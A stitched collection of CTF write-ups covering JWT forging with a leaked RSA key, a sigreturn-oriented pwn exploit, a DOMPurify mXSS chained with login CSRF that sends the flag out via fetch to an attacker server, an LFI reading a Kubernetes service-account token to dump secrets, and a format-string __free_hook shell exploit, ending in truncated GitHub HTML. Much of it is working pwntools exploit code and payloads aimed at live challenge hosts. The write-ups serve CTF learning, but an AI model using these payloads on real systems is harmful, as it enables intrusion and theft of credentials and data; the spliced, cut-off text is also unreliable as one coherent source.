```ASN.1-----BEGIN RSA PRIVATE KEY-----MIICmwIBAAKBjgD//////////////////////////////////////////////////////////////////////////////////////3/////////////+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECAwEAAQKBjSp/1YAqf9WAKn/VgCp/1YAqf9WAKn/VgCp/1YAqf9WAKn/VgCp/1YAqf9WAKn/VgCp/1YAqf9WAKn/VgCp/1YAqVVWqqlVVqqpVVaoAVf+qAFX/qgBV/6oAVf+qAFX/qgBV/6oAVf+qAFX/qgBV/6oAVf+qAFX/qgBV/6oAVf+qAFX/qgBV/6oAVf+qAQJMf////////////////////////////////////////////////////////////////////////////////////////////////////wJCAf//////////////////////////////////////////////////////////////////////////////////////AkxVVaqqVVWqqlVVqqpVVaqqVVWqqlVVqqpVVaqqVVWqqlVVqqpVVaqqVVWqqlVVqqpVVaqqVVWqqlVVqqpVVaqqVVWqqlVVqqpVVaqpAkIBgIB/f4CAf3+AgH9/gIB/f4CAf3+AgH9/gIB/f4CAf3+AgH9/gIB/f4CAf3+AgH9/gIB/f4CAf3+AgH9/gIB/f38CTHve973ve973ve9773ve973ve973ve+973ve973ve973vve973ve973ve9773ve973ve973ve+973ve973ve973vve973ve973ve970=-----END RSA PRIVATE KEY-----```
修改`payload`中的`sleep`为`true`和`exp`为`9999999999`,生成`JWT Token`并请求`/flag`
代码:
```Pythonimport jwt
with open('private.pem','r') as f: secret = f.read()print(secret)
dic = { "fresh": False, "iat": 1631241476, "jti": "4b30d7a8-256f-405e-9640-4278728a8602", "type": "access", "sub": "devil", "nbf": 1631241476, "exp": 9999999999, "sleep": "true", "danger": "true"}headers = { "typ": "JWT", "alg": "RS256"}token = jwt.encode(dic, secret, headers=headers, algorithm='RS256')print(token)```
**flag:**`TMUCTF{0h_51nn3rm4n_Wh3r3_Y0u_60nn4_Run_70?}` |
The credits of this writeup go to KZA.I used his writeup to understand the tool. The goal of this writeup is to give more details about all the steps for people (like me) who are beginners in digital forensic.Enjoy! |
## **Stress Rope**
was a pwn challenge from Tamil CTF 2021.
it is a small echo server written in assembly, very small, with no libc, very few gadgets..
there are may ways to exploit it, let's look at the reverse

so my exploitation goes like this:
**1st step:**

we return to 0x40008d address, at the "sub rsi,8" , to read again another bloc, a bit before on stack, to put the filename of the file we want to open there (rsi will point on it). we wait for the next send so...
**2nd step:**

we send the filename that will be written to rsi, we adjust the packet size to 257 , the syscall number of openfileat, which act as open, but the filename is in rsi and not rdi, which is simpler to setup for us. If the filename is absolute, rdi will just be ignored..perfect for us.
We use a little trick, /proc/self/cwd/flag.txt is used as a path, which means the current directory of the actual process..as we don't know the name of the remote directory..
we call the syscall gadget 0x40009b (with rsi, and rax = 257)
then we call one time 0x4000a3 so send back to the program a 8 bytes blocs, to make a stop between read.. as the buffering can otherway add small packet sending into a bigger one.
then we return again to read for step3
**3rd step:**

ok know that we have open the filename for the flag, we are going to put a sigrop frame on stack for the last step.
We don't know the fd number returned by openfileat, but as only stdin, stdout, stderr, a socket should be open remotely..it's probably a small number, 4, 5 or 6 ....we can guess it quickly..
the frame we prepared looks like this

it is a call to sendfile syscall, which take a input fd, and output fd, and a length basically.
It will transfer data frome the opened fd from openfileat (the flag), to stdout (fd = 1)
and we will receive it...
**4th step:**

last step, but not least...
we send a payload of size 15, so setup rax=15 for sigreturn syscall..
and so we execute the sendfile syscall, that will send us back our flag...
here is the exploit code:
```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *
context.update(arch="amd64", os="linux")context.log_level = 'debug'
exe = ELF('./echo-echo')
host, port = "3.97.113.25", "9002"
p = remote(host,port)
# sendfile sigrop frame ; send us back the opened file via stdoutframe = SigreturnFrame(arch="amd64", kernel="amd64")frame.rax = 40 # sendfile syscall numberframe.rdi = 1 # stdoutframe.rsi = 5 # remote fd for file opened (found after some tries)frame.rdx = 0frame.r10 = 512 # arbitrary sizeframe.rsp = 0x400800 # arbitrary stack address (will crash after output anyway)frame.rip = 0x40009b # syscall gadget
frame = bytes(frame)frame = frame[0:0xd0] # we cut down the size of the frame, because we don't care of the end (empty)
gadget1 = 0x4000a3
# first return back to read, but at sub rsi,8 to write before our buffer the filenamepayload = p64(0xdeadbeef)+p64(0x40008d)payload = payload.ljust(0x12c,'\x00')p.send(payload)
# send the filename to open and continue ROPPING, sometimes output 8 bytes, to stop between read & writepayload2 = '/proc/self/cwd/flag.txt'.ljust(24,'\x00')+p64(0x40009b)+p64(0x4000a3)+p64(0x400085)# set the length of this payload to 257, to set eax=257 for next part (openfileat syscall)payload2 = payload2.ljust(257,b'\x00')p.send(payload2)
print(p.recv(8))
# put the frame for the sigrop on stackpayload3 = p64(0xdeadbeef)+p64(0x400085)+p64(0xdeadbeef)+framepayload3 = payload3.ljust(0x12c,'\x00')p.send(payload3)
# set this payload length to 15, to set eax=15 for sigreturn syscallpayload4 = p64(0xdeadbeef)+p64(0x40009b)[0:7]payload4 = payload4.ljust(15,b'\x00')p.send(payload4)
# we receive back flag now send by the sendfile sigropp.interactive()```
*nobodyisnobody still pwning things* |
# NotepadChallenge description:>I made a markdown editor for all your hacking notes! \> Author: todo#7331
To begin the challenge, we can access a website where we can post notes:
After logging in, we can edit and view our notes + we can report a bug to the admin:

The "Report a Bug" button is an indicatior that an XSS is involved in the challenge... As you can see from our last image, it's possible to insert HTML in our notes. However, they are using two JS libraries before inserting our input on the page: DomPurify and ShowdownJS.
```javascript=const converter = new showdown.Converter();// http://showdownjs.com/ -> Markdown to HTML converter
// some stuff here...
if(view === 'view') { markdown.innerHTML = DOMPurify.sanitize(converter.makeHtml(editor.value));}/* * What is inside the note's textarea (text we can edit) is taken with "editor.value" * Then Showdown converts it to HTML and DOMPurify sanitizes it * Finally, our input is added to the page using innerHTML (dangerous...) */```
Showdown is used to convert Markdown to HTML and DomPurify is responsible for removing any dangerous tags - that could cause an XSS for example.Looking at the versions of these libs:- DomPurify 2.0.7 -> old!!! latest version is 2.3.3- Showdown 1.9.1 -> latest version
DomPurify is outdated and by looking at possible vulns in its version 2.0.7 [here](https://snyk.io/vuln/npm:[email protected]), we find something related to mXSS...
We had to try some stuff until we where able to trigger the mXSS... These 2 worked:```htmlmixed=<math><mtext><table><mglyph><style><math><table id="</table>"\> <math><mtext><table><mglyph><style><math><table id="</table>"\>```
So, we can execute any Javascript code in our notes' page!
Now we probably need to make an admin visit our page. To do that, we need to find a way to authenticate the admin as ourselves.
It's not possible to insert the challenge's page in iframes because of this:```[email protected]_requestasync def add_security_headers(resp): resp.headers['Content-Security-Policy'] = "frame-ancestors 'none'" resp.headers['X-Frame-Options'] = 'none' # 'X-Frame-Options: 'none' doesn't exists. Should've been "deny", but this doesn't matter because frame-ancestors 'none' makes X-Frame-Options obsolete return res```
However, there's no CSRF token. We can try to send the admin to a server we control. From there, we log the admin in our account. The "Report a bug" page allows sending pages from other domains.
So, we need to server a page that forces the admin to login with our user. The page will be something like this:```htmlmixed=
<html> <body> <form action="https://web-notepad-f6ed1a7d.chal-2021.duc.tf/login" method="POST" id="abc"> <label for="username">Username</label> <input id="username" type="text" name="username" value="our_user" required> <label for="password">Password</label> <input id="password" type="password" name="password" value="our_password" required> <button class="button primary">Login</button> </form> <script> document.getElementById('abc').submit(); </script> </body></html>```
<label for="username">Username</label> <input id="username" type="text" name="username" value="our_user" required>
<label for="password">Password</label> <input id="password" type="password" name="password" value="our_password" required>
Moreover, looking again at the `app.py` file we where given, we see that there's an `/admin` route we can't access - only admins can. So, to reach the flag, we can make the real admin visit the `/admin` page and send the flag to us.```[email protected]('/admin')async def admin(): if quart.session.get('admin') != 1: return "", 403 return open('flag.txt').read()```
With this in mind, we can create and store our XSS payload in `/me`:```htmlmixed=<math><mtext><table><mglyph><style><math><table id="</table>"\>```
Then, we just "Report a Bug" to admin, passing our server in the URL field. What will happen is:1. Admin will access our page submit a form to the challenge website, logging in as ourselves;2. They will be redirected (after the login) to the challenge website, going into our notes page (user is redirected to `/me` after login);3. The XSS payload stored in our notes will trigger;4. The javascript in our payload will make the admin (logged in our account) request the content of the `/admin` page, reading the flag and storing it in `res`;5. The flag will be send to us with `fetch('https://<our_server>/a='+btoa(res)))`.
Done! We just need to check the requests made to our server and we find the flag base64 encoded:
**FLAG: DUCTF{ch4ining_c5rf_c4uses_cha0s_2045c24d}** |
# writeupWrite up for the `Whale Blog` challenge
## Enumeration phase
After checking source for the `http://whale-blog.duc.tf:30000/` we can see useful information:```htmlWarning: Undefined array key "page" in /var/www/html/index.php on line 3```* the `page` parameter could be changed* files are in the `/var/www/html/` directory
```htmlI wonder if we will deploy this at whale-blog.duc.tf or at whale-endpoint.duc.tf```* two domains exist `whale-blog.duc.tf` and `whale-endpoint.duc.tf` and application is contenerised in docker
Based on the above information we can predict we're dealing with Application in the Docker container and the orhestrator is probably Kubernetes (`whale-endpoint.duc.tf`).We can prove it by making a request to this endpoint:```bashcurl -k https://whale-endpoint.duc.tf/api/```and as a result we can see:```json{ "kind": "Status", "apiVersion": "v1", "metadata": {
}, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/api/\"", "reason": "Forbidden", "details": {
}, "code": 403}```which means the user without authorization is forbidden.
## Use LFI for getting the credentials
We can use existing LFI for checking the credentials by making request to `http://whale-blog.duc.tf:30000/?page=../../../../var/run/secrets/kubernetes.io/serviceaccount/token`
```bashcurl -s http://whale-blog.duc.tf:30000/\?page\=../../../../var/run/secrets/kubernetes.io/serviceaccount/token |sed -n 's/.*\(.*\)<\/pre>.*/\1/p' > token```
## Get the flag by using kubernetes API
When we have a token we can start working with kubernetes API:```bashkubectl config set-cluster ductf --server=https://whale-endpoint.duc.tf/kubectl get pods --token=$(cat token)```
We can see the problem with the SSL but we can ignore it by option `--insecure-skip-tls-verify` and we can get secret:```bashkubectl --insecure-skip-tls-verify --token=$(cat token) get secretskubectl --insecure-skip-tls-verify --token=$(cat token) get secret nooooo-dont-read-me -o jsonpath="{.data}"```
After base64 decode the output we have a flag. |
Challenge (Forensic)
It is a straight forward challenge, use your tools wisely
Author - 0xCyberPj
link [download](images/vim-bar.pcap)
-------------------------
Since it's a pcap file, we can use wireshark to explore.

We can see that its just TCP packets. Looking at the stream index, we can see there are 3 different TCP streams.
Following the TCP stream 0, we can see its actually the output of the terminal. But it doesn't help us much.

Moving on to TCP stream 1, we see there are just 2 packets and one of them is RST so we can skip this.
TCP stream 2 also doesn't provide us much info.

TCP stream 3 is where things get interesting. This has the hex dump of a file and the hint vim_crypt tells us that its a file encrypted by vim.

So we create the file locally using the hex dump. But when we open it with vim, we can see its encrypted and is asking for the key

I'm using the python package called [vimdecrypt](https://github.com/nlitsme/vimdecrypt) to bruteforce the password using the rock_you wordlist.

The password used to encrypt was **samantha** and the flag is **TamilCTF{vi_vii_viiim_lol}** |
CringeNcoder (web)
flag is located at flag, but its not flag
AUTHOR - Jo Praveen
http://45.79.195.170:5000/
----------------
This challenge was under web but it was more of a scripting challenge.
Flag was **TamilCTF{f1nally1nn3pe4ceaf73rs0m4nycring3s}** |
# TaskOne of the hardest parts of making a contest is making sure that it has a good curve aka a good problem difficulty distribution. This lazily made problem was made to make the beginning pwn curve a little less steep. Connect with "nc 143.198.127.103 42004". We have an executable called "curve", dynamically linked with "libc-2.31.so" and "ld-2.31.so".
Therefore, the first thing to do to test it locally is to patch the binary to let it use the provided libraries:
```$ patchelf --set-interpreter ./ld-2.31.so --add-needed ./libc-2.31.so ./curve --output ./curve_patchelf```
# AnalysisLet's check the file:
```$ file curvecurve: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=e8fe3eece1912689d5e47acaf76c1dca070f4ad8, not stripped```And now let's check its security options:
```$ checksec curve Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled```We can see that all protections are enabled (we assume that ASLR is enabled on the server, otherwise the PIE would not be much useful).
If we interact with it:
```$ ./curve_patchelf Oh no! Evil Morty is attempting to open the central finite curve!You get three inputs to try to stop him.
Input 1:aa
Input 2:a
Input 3:aa
Lol how could inputting strings stop the central finite curve.```It takes 3 inputs; the first and the last are echoed back to us. Let's see the actual way this is done by running the program with ltrace.
```$ ltrace ./curvesetbuf(0x7f00c92696a0, nil) = <void>setbuf(0x7f00c92695c0, nil) = <void>malloc(128) = 0x55db2ad8d2a0puts("Oh no! Evil Morty is attempting "...Oh no! Evil Morty is attempting to open the central finite curve!) = 66puts("You get three inputs to try to s"...You get three inputs to try to stop him.
) = 42puts("Input 1:"Input 1:) = 9read(0AAAA, "AAAA\n", 176) = 5puts("AAAA\n"AAAA
) = 6puts("Input 2:"Input 2:) = 9read(0BBBB, "BBBB\n", 128) = 5puts("\nInput 3:"Input 3:) = 10read(0CCCC, "CCCC\n", 128) = 5printf("CCCC\n"CCCC) = 5free(0x55db2ad8d2a0) = <void>puts("\nLol how could inputting strings"...Lol how could inputting strings stop the central finite curve.) = 64+++ exited (status 0) +++```It is clear that there is a format string vulnerability on the third input. But we can't do much just with that, because of the protections.
So, let's decompile the main function:

In addition to the format string vulnerability on the third input, there is a stack overflow on the first input.
The second input is not vulnerable, but it can be useful to put useful data on the buffer, for the format string exploit, since the buffer is allocated on the stack.
The format string itself is allocated on the heap, so we can't use the automatic exploitation provided by pwntools (it assumes that the format string is allocated on the stack).
Now, it's time to figure out what to do to get a shell.
# ExploitAfter the call to "printf", there is a call to "free" and a call to "puts".
So the first thing that comes to mind is a GOT overwrite; but we can't do it, because the binary is full RELRO, so the GOT is read-only.
Taking advantage of the stack buffer overflow on the first input, we can exploit the "puts" related to that buffer (which is local_98 in the code): the first byte of the canary is always a NULL byte. If we overwrite that byte, the puts will print out the other 7 bytes of the canary. At this point, "if we had" stack overflow on the second input, we could overwrite the return address of main function and fix the canary at the same time. So in that case our exploit would use the canary leak and the libc leak (main function returns to libc_start_main).
But we don't have stack overflow on the second input, so the canary leak is not useful; it's still very useful to have the libc leak, so we'll use the first input for that.
To be more clear, the stack layout is like that:
```Buffer 136 bytesCanary (with leading NULL byte), 8 bytesSaved base pointer (RBP) 8 bytesReturn address <libc_start_main+234> 8 bytes```As first input, we send 136 + 8 + 8 printable bytes, and we get in return these bytes, followed by that return address, from which we can compute libc base address. Now, what can we do to take control of the execution flow, by using the format string attack?
We see that the "free" function is called after the printf. A common attack is the overwrite of the __free_hook. The __free_hook (like __malloc_hook and __realloc_hook) is a debug function intended to change the behavior of "free" function: it is initialized to NULL; if it is set to a value different from NULL by the application, it is called by the "free" function, which acts as a wrapper, and the argument passed to the "free" function is also passed to the __free_hook, because it is intended for debug. In our case, the argument passed to the "free" function is the address of the format string.
So, our exploitation strategy is to use libc "system" function as __free_hook.
To do that, we have to place "sh\x00\x00" at the start of the format string. But we also need the format string to overwrite the __free_hook, so we can't have NULL bytes in our input. It means that we need to update the content of our string at runtime, using the format string attack itself. It's not hard because the format string is the first argument on the stack, so the first part of the payload is:
```%Nc%1$n```where N is the integer representation of "sh\x00\x00", "c" following N specifies that N whitespaces must be printed, %1$n specifies that the number of characters printed so far must be written at the address specified in the 1st parameter on the stack; we write an integer, but we write it in a string, so it is "unpacked" as an array of characters. Now we only have to overwrite the __free_hook.
To do this, we have to use the second input, because the %n specifier needs an address to perform its write, and it's perfect to input this address with the second input because we already have the libc leak (after the first input) and the data is stored on the stack, so we can easily access it like format string positional parameters.
After a few tests, we see that the start of the buffer where the write related to the second input is performed is the 8th format string parameter. In fact:```$ ./curve_patchelf Oh no! Evil Morty is attempting to open the central finite curve!You get three inputs to try to stop him.
Input 1:AAAAAAAAAAAAAAAA
Input 2:BBBBBBBB
Input 3:%8$llx4242424242424242
Lol how could inputting strings stop the central finite curve.```"4242424242424242" is just the hex representation of "BBBBBBBB", which is our second input. We can't overwrite an 8 bytes-address in one-shot, because of the way the specifier %n works; we will overwrite 2 bytes at a time, so we need to place 4 consecutive addresses in the buffer (which will be 8th parameter, 9th parameter and so on), and we have to specify that each write must be of 2 bytes: %hn, i.e. short size integer.
We also need to pay attention to the number of character written so far in general, because the use of %n specifier doesn't reset the count.
As last thing, we have to ensure that the format string payload is shorter than 128 (see decompiled code).
A possible format string, for a given libc base address:
```%26739c%1$n%46557c%8$hn%3894c%9$hn%21044c%10$hn%32838c%11$hn```We managed to get the shell, and the flag, with this exploit. Here is the script.
# Script```from pwn import ELF, process, remote, context, p64, u64
def main(): elf = ELF("./curve_patchelf") libc = ELF("./libc-2.31.so") context.binary = elf # r = process(elf.path) r = remote("143.198.127.103", 42004)
# INPUT 1 payload = b"A"*(136 + 8 + 8) r.sendafter(b"Input 1:\n", payload)
r.recv(136) # PADDING r.recv(8) # PADDING OVER CANARY r.recv(8) # PADDING OVER RBP leak = u64(r.recv(6) + b"\x00"*2) libc.address = leak - 234 - libc.symbols["__libc_start_main"]
# INPUT 2 address = libc.symbols["__free_hook"] payload = b"".join([p64(address+(i*2)) for i in range(4)]) r.sendlineafter(b"Input 2:\n", payload)
# INPUT 3 content = p64(libc.symbols["system"]) content = [content[i:i+2] for i in range(0, 8, 2)] offset = 8 s = b"sh\x00\x00" s = int.from_bytes(s, "little") payload = f"%{s}c%1$n" numwritten = s for i in range(len(content)): l = int.from_bytes(content[i], "little") x = (l - numwritten) % 0x10000 payload += f"%{x}c%{offset+i}$hn" numwritten = l assert len(payload) <= 0x80, "PAYLOAD TOO LONG" print(payload) r.sendlineafter(b"Input 3:\n", payload)
r.interactive()
if __name__ == "__main__": main()
```
flag{n0w_y0ur3_3v1l_m0rty_t00_s00n3r_0r_l4t3r_w3_4ll_4r3_s4dg3} |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" 